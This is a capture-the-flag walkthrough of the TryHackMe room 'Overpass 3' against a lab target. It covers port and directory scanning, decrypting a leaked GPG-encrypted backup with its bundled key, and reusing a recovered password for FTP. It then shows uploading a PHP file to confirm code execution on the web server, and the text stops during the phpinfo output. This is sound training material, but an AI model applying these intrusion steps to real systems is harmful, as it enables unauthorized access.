Overpass 3 - TryHackMe

Featured image

Overpassed? The Story so Far…

While the original Overpass room (Writeup here) dealt with Password Managers, they were unfortunately hacked in Overpass 2 (Which is an excellent blue-team walkthrough). Since then the password manager went bust and the company has switched to web hosting in Overpass 3 Surely nothing can go wrong!

Looking Around

So as always, we start by looking at what’s on our target. For this, I like to use Rustscan as it’s quite a bit faster than nmap alone.


rustscan -a $TARGET*IP -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

---

: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :

---

Nmap? More like slowmap.🐒

[~] The config file is expected to be at "/home/hydra/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open $TARGET_IP:21
Open $TARGET_IP:22
Open $TARGET_IP:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-25 17:52 CET
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
Initiating Ping Scan at 17:52
Scanning $TARGET_IP [2 ports]
Completed Ping Scan at 17:52, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:52
Completed Parallel DNS resolution of 1 host. at 17:52, 1.01s elapsed
DNS resolution of 1 IPs took 1.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:52
Scanning $TARGET_IP [3 ports]
Discovered open port 80/tcp on $TARGET_IP
Discovered open port 22/tcp on $TARGET_IP
Discovered open port 21/tcp on $TARGET_IP
Completed Connect Scan at 17:52, 0.03s elapsed (3 total ports)
Initiating Service scan at 17:52
Scanning 3 services on $TARGET_IP
Completed Service scan at 17:52, 6.07s elapsed (3 services on 1 host)
NSE: Script scanning $TARGET_IP.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 3.38s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
Nmap scan report for $TARGET_IP
Host is up, received syn-ack (0.031s latency).
Scanned at 2021-01-25 17:52:05 CET for 11s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfSHQR3OtIeAUFx18phN/nfAIQ2uGHuJs0epoqF184E4Xr8fkjSFJHdA6GsVyGUjdlPqylT8Lpa+UhSSegb8sm1So8Nz42bthsftsOxMQVb/tpQzMUfjcxQOiyVmgxfEqs2Zzdv6GtxwgZWhKHt7T369ejxnVrZhn0m6jzQNfRhVoQe/jC20RKvBf8l8s6/SusbZR5SFfsg71KyrSKOXOxs12GhXkdbP32K3sXVEpWgfCfmIZAc2ZxNtL5uPCM4AOfjIFJHl1z9EX04ZjQ1rMzzOh9pD/b+W2mXt2nQGzRPnc8LyGDE0hFtw4+lBCoiH8zIt14S7dwbFFV1mWxbtZXVf7JhPiZDM2vBfqyowsDZ5oc2qyR+JEU4pqeVhRygs41isej/el19G8+ehz4W07KR97eM2omB25JehO7E4tpX1l8Imjs1XjqhhVuGE2tru/p62SRQOKzRZ19MCIFPxleSLorrHq/uuKdvd8j6rm0A9BrCsiB6gmPfal6Kr55vlU=
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAPAji9Nkb2U9TeP47Pz7BEa943WGOeu5XrRrTV0+CS0eGfNQyZkK6ZICNdeov65c2NWFPFsZTFjO8Sg+e2n/lM=
| 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM/U6Td7C0nC8tiqS0Eejd+gQ3rjSyQW2DvcN0eoMFLS
80/tcp open http syn-ack Apache httpd 2.4.37 ((centos))
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|\_http-server-header: Apache/2.4.37 (centos)
|\_http-title: Overpass Hosting
Service Info: OS: Unix

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:52
Completed NSE at 17:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds

Looks like we have ftp, ssh and http to play with. Let’s see if we can get an anonymous login on ftp to start.

FTP (take 1)


ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.

HTTP Then

Guess not. Onward to http.


curl -v $TARGET_IP

-   Trying $TARGET_IP:80...
-   Connected to $TARGET_IP ($TARGET_IP) port 80 (#0)
> GET / HTTP/1.1
> Host: $TARGET_IP
> User-Agent: curl/7.74.0
> Accept: */*
-   Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 25 Jan 2021 17:15:20 GMT
< Server: Apache/2.4.37 (centos)
< Last-Modified: Tue, 17 Nov 2020 20:42:56 GMT
< ETag: "6ea-5b4538a1d1400"
< Accept-Ranges: bytes
< Content-Length: 1770
< Content-Type: text/html; charset=UTF-8
<

&lt;!DOCTYPE html&gt;
&lt;head&gt;
    &lt;link rel=&#34;stylesheet&#34; type=&#34;text/css&#34; media=&#34;screen&#34; href=&#34;main.css&#34;&gt;
    &lt;title&gt;Overpass Hosting&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;nav&gt;
        &lt;img class=&#34;logo&#34; src=&#34;overpass.svg&#34; alt=&#34;Overpass logo&#34;&gt;
        &lt;h2 class=&#34;navTitle&#34;&gt;Overpass Hosting&lt;/h2&gt;
    &lt;/nav&gt;
    &lt;div id=&#34;imageContainer&#34;&gt;
        &lt;img src=&#34;hallway.jpg&#34;&gt;
    &lt;/div&gt;
    &lt;main&gt;
        &lt;h2&gt;What can Overpass do for you?&lt;/h2&gt;
        &lt;p&gt;Overpass offer a range of web and email hosting solutions, ideal for both individuals and small businesses.
        &lt;/p&gt;
        &lt;p&gt;We promise a 5 nines uptime,
            &lt;!-- 0.99999% is 5 nines, right? --&gt;and negotiable service level agreements down to of a matter of days to keep your business
            running smoothly even when technology gets in the way.
        &lt;/p&gt;
        &lt;h3&gt;Meet the Team&lt;/h3&gt;
        &lt;p&gt;Our loyal employees span across multiple timezones and countries, so that you can always get the support you
            need to keep your website online.&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up&lt;/li&gt;
            &lt;li&gt;Elf - Overpass&#39; newest intern, Elf. Elf helps maintain the webservers day to day to keep your
                site running smoothly and quickly.&lt;/li&gt;
            &lt;li&gt;MuirlandOracle - HTTPS and networking specialist. Muir&#39;s many years of experience and enthusiasm for
                networking keeps Overpass running, and your sites, online all of the time.&lt;/li&gt;
            &lt;li&gt;NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions
                or want to discuss how Overpass can help your business, reach out to him!&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/main&gt;
&lt;/body&gt;

* Connection #0 to host $TARGET_IP left intact

Aside from a snarky comment, there’s nothing here that we can easily exploit. Let’s try a directory scan.

Busting DoorsSites for Fun and Profit

So let’s break out the artillery and see what we have. For this, we can use FeroxBuster, which is a rust-based fuzzer that is incredibly fast (sometimes too fast…)


feroxbuster -u http://$TARGET_IP -f -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -d 1
 ___  ___  __   __     __      __         __   __
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“ ver: 1.12.3
───────────────────────────┬──────────────────────
🎯 Target Url β”‚ http://$TARGET_IP
πŸš€ Threads β”‚ 50
πŸ“– Wordlist β”‚ /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
πŸ†— Status Codes β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405]
πŸ’₯ Timeout (secs) β”‚ 7
🦑 User-Agent β”‚ feroxbuster/1.12.3
πŸͺ“ Add Slash β”‚ true
πŸ”ƒ Recursion Depth β”‚ 1
πŸŽ‰ New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menuβ„’
──────────────────────────────────────────────────
200 1006l 4984w 0c http://$TARGET_IP/icons/
200 15l 55w 894c http://$TARGET_IP/backups/
403 9l 24w 219c http://$TARGET_IP/.htpasswd/
403 9l 24w 219c http://$TARGET_IP/.htaccess/
403 9l 24w 217c http://$TARGET_IP/cgi-bin/
[####################] - 12s 20473/20473 0s found:5 errors:0
[####################] - 12s 20473/20473 1684/s http://$TARGET_IP

Back Me Up and Back Me Down

So we can see a backups folder. Let’s see what’s inside.


curl $TARGET_IP/backups/

&lt;!DOCTYPE HTML PUBLIC &#34;-//W3C//DTD HTML 3.2 Final//EN&#34;&gt;
&lt;html&gt;
 &lt;head&gt;
  &lt;title&gt;Index of /backups&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
&lt;h1&gt;Index of /backups&lt;/h1&gt;
  &lt;table&gt;
   &lt;tr&gt;&lt;th valign=&#34;top&#34;&gt;&lt;img src=&#34;/icons/blank.gif&#34; alt=&#34;[ICO]&#34;&gt;&lt;/th&gt;&lt;th&gt;&lt;a href=&#34;?C=N;O=D&#34;&gt;Name&lt;/a&gt;&lt;/th&gt;&lt;th&gt;&lt;a href=&#34;?C=M;O=A&#34;&gt;Last modified&lt;/a&gt;&lt;/th&gt;&lt;th&gt;&lt;a href=&#34;?C=S;O=A&#34;&gt;Size&lt;/a&gt;&lt;/th&gt;&lt;th&gt;&lt;a href=&#34;?C=D;O=A&#34;&gt;Description&lt;/a&gt;&lt;/th&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;th colspan=&#34;5&#34;&gt;&lt;hr&gt;&lt;/th&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td valign=&#34;top&#34;&gt;&lt;img src=&#34;/icons/back.gif&#34; alt=&#34;[PARENTDIR]&#34;&gt;&lt;/td&gt;&lt;td&gt;&lt;a href=&#34;/&#34;&gt;Parent Directory&lt;/a&gt;       &lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td align=&#34;right&#34;&gt;  - &lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td valign=&#34;top&#34;&gt;&lt;img src=&#34;/icons/compressed.gif&#34; alt=&#34;[   ]&#34;&gt;&lt;/td&gt;&lt;td&gt;&lt;a href=&#34;backup.zip&#34;&gt;backup.zip&lt;/a&gt;
   &lt;/td&gt;&lt;td align=&#34;right&#34;&gt;2020-11-08 21:24  &lt;/td&gt;&lt;td align=&#34;right&#34;&gt; 13K&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;th colspan=&#34;5&#34;&gt;&lt;hr&gt;&lt;/th&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;


It’s a bit of a mess, but this is a directory listing. Inside we see a file called backup.zip, which is always a great target for the taking. Let’s grab it!


curl $TARGET_IP/backups/backup.zip -o backup.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13353 100 13353 0 0 149k 0 --:--:-- --:--:-- --:--:-- 149k

unzip backup.zip
Archive: backup.zip
extracting: CustomerDetails.xlsx.gpg
inflating: priv.key

GPG Decryption

GPG encrypted data AND the key that goes with it? Let’s go!


gpg --import priv.key
gpg: key C9AE71AB3180BC08: public key "Paradox " imported
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1

gpg -o CustomerDetails.xlsx -d CustomerDetails.xlsx.gpg
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
"Paradox "

So now we have an xlsx file, which as we all know is a Microsoft Excel file. We could just unzip it and try to decipher everything manually. But LibreOffice can also view these files.

The table is extracted here, with all the important bits redacted out, of course

Customer Name Username Password Credit card number CVC
Par. A. Doxx paradox ***************** 4111 1111 4555 1142 432
0day Montgomery 0day ***************** 5555 3412 4444 1115 642
Muir Land muirlandoracle ***************** 5103 2219 1119 9245 737

Let’s see if anyone is silly enough to reuse passwords.

SSH?

There’s no authentication on the website, so we probably need to look at another service to gain access. Let’s try ssh:


ssh paradox@$TARGET_IP
The authenticity of host '$TARGET_IP ($TARGET_IP)' can't be established.
ECDSA key fingerprint is SHA256:Zc/Zqa7e8cZI2SP2BSwt5iLz5wD3XTxIz2SLZMjoJmE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$TARGET_IP' (ECDSA) to the list of known hosts.
paradox@$TARGET_IP: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

Welp that sucks, looks like he configured ssh properly. We can try the other two users as well.


ssh 0day@$TARGET_IP
0day@$TARGET_IP's password:
Permission denied, please try again.
0day@$TARGET_IP's password:

ssh muirlandoracle@$TARGET_IP
muirlandoracle@$TARGET_IP's password:
Permission denied, please try again.
muirlandoracle@$TARGET_IP's password:

No dice. this leaves FTP

FTP (Take 2)

let’s try ftp with paradox


ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 48       48             24 Nov 08 21:25 backups
-rw-r--r--    1 0        0           65591 Nov 17 20:42 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17 20:42 index.html
-rw-r--r--    1 0        0             576 Nov 17 20:42 main.css
-rw-r--r--    1 0        0            2511 Nov 17 20:42 overpass.svg
226 Directory send OK.
ftp> bye
221 Goodbye.

This looks suspiciously like the website, I wonder if it’s pointing to a live server? We can try uploading a file.


echo "Hello, World!" > test.txt

ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
14 bytes sent in 0.00 secs (290.8910 kB/s)
ftp> bye
221 Goodbye.

curl -v http://$TARGET_IP/test.txt
*   Trying $TARGET_IP:80...
* Connected to $TARGET_IP ($TARGET_IP) port 80 (#0)
> GET /test.txt HTTP/1.1
> Host: $TARGET_IP
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 25 Jan 2021 19:43:48 GMT
< Server: Apache/2.4.37 (centos)
< Last-Modified: Mon, 25 Jan 2021 19:43:38 GMT
< ETag: "e-5b9bec118dbfd"
< Accept-Ranges: bytes
< Content-Length: 14
< Content-Type: text/plain; charset=UTF-8
<
Hello, World!
* Connection #0 to host $TARGET_IP left intact

We can upload files to a web server, huzzah, do we have php? Let’s check with a simple php file.


echo '' > info.php

ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:hydra): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put info.php
local: info.php remote: info.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
20 bytes sent in 0.00 secs (476.3719 kB/s)
ftp> bye
221 Goodbye.

curl -v http://$TARGET_IP/info.php
*   Trying $TARGET_IP:80...
* Connected to $TARGET_IP ($TARGET_IP) port 80 (#0)
> GET /info.php HTTP/1.1
> Host: $TARGET_IP
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 25 Jan 2021 20:23:14 GMT
< Server: Apache/2.4.37 (centos)
< X-Powered-By: PHP/7.2.24
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<

&lt;!DOCTYPE html PUBLIC &#34;-//W3C//DTD XHTML 1.0 Transitional//EN&#34; &#34;DTD/xhtml1-transitional.dtd&#34;&gt;
&lt;html xmlns=&#34;http://www.w3.org/1999/xhtml&#34;&gt;&lt;head&gt;
&lt;style type=&#34;text/css&#34;&gt;
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
&lt;/style&gt;
&lt;title&gt;phpinfo()&lt;/title&gt;&lt;meta name=&#34;ROBOTS&#34; content=&#34;NOINDEX,NOFOLLOW,NOARCHIVE&#34; /&gt;&lt;/head&gt;
&lt;body&gt;&lt;div class=&#34;center&#34;&gt;
&lt;table&gt;
&lt;tr class=&#34;h&#34;&gt;&lt;td&gt;
&lt;a href=&#34;http://www.php.net/&#34;&gt;&lt;img border=&#34;0&#34; src=&#34;data:image/png;base64,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&#34; alt=&#34;PHP logo&#34; /&gt;&lt;/a&gt;&lt;h1 class=&#34;p&#34;&gt;PHP Version 7.2.24&lt;/h1&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;table&gt;
